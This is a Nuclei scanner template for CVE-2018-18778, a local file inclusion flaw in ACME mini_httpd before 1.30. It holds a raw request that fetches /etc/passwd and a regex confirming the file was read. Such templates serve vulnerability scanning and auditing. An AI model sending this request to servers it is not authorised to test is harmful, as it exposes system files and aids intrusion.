nuclei-templates/cves/2018/CVE-2018-18778.yaml

37 lines
873 B
YAML

id: CVE-2018-18778
info:
name: ACME mini_httpd <1.30 - Local File Inclusion
author: dhiyaneshDK
severity: medium
description: ACME mini_httpd before 1.30 is vulnerable to local file inclusion.
reference:
- https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
- http://www.acme.com/software/mini_httpd/
- https://nvd.nist.gov/vuln/detail/CVE-2018-18778
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2018-18778
cwe-id: CWE-200
tags: cve,cve2018,lfi,mini_httpd
requests:
- raw:
- |+
GET /etc/passwd HTTP/1.1
Host:
unsafe: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/07/22